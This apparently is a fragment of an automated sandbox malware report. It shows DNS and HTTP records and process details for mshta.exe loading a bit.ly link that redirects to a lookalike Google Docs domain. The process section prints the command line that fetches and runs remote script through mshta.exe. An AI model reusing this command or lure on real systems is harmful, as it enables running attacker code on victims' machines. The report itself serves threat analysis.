                        Feb 2, 2023 00:31:42.568176985 CET8.8.8.8192.168.2.30xcd11No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)false
                        Feb 2, 2023 00:31:43.216392994 CET8.8.8.8192.168.2.30x612dName error (3)page.googledocpage.comnonenoneA (IP address)IN (0x0001)false
                        • bit.ly
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.34969667.199.248.10443C:\Windows\System32\mshta.exe
                        TimestampkBytes transferredDirectionData
                        2023-02-01 23:31:42 UTC0OUTGET /35FlWc2 HTTP/1.1
                        Accept: */*
                        Accept-Language: en-US
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: bit.ly
                        Connection: Keep-Alive
                        2023-02-01 23:31:43 UTC0INHTTP/1.1 301 Moved Permanently
                        Server: nginx
                        Date: Wed, 01 Feb 2023 23:31:43 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 162
                        Cache-Control: private, max-age=90
                        Location: https://page.googledocpage.com/WiU+Q6cgIESl8BPJ/swFnyqX1uFiFiTyQY6yZbnIMwc=
                        Set-Cookie: _bit=n11nvH-912f788aed2eeb8689-00B; Domain=bit.ly; Expires=Mon, 31 Jul 2023 23:31:43 GMT
                        Via: 1.1 google
                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                        Connection: close
                        2023-02-01 23:31:43 UTC0INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 67 65 2e 67 6f 6f 67 6c 65 64 6f 63 70 61 67 65 2e 63 6f 6d 2f 57 69 55 2b 51 36 63 67 49 45 53 6c 38 42 50 4a 2f 73 77 46 6e 79 71 58 31 75 46 69 46 69 54 79 51 59 36 79 5a 62 6e 49 4d 77 63 3d 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://page.googledocpage.com/WiU+Q6cgIESl8BPJ/swFnyqX1uFiFiTyQY6yZbnIMwc=">moved here</a></body></html>


                        Click to jump to process

                        Click to jump to process

                        Target ID:0
                        Start time:00:31:41
                        Start date:02/02/2023
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\WINDOWS\system32\mshta.exe" https://bit.ly/35FlWc2
                        Imagebase:0x7ff7a3510000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        No disassembly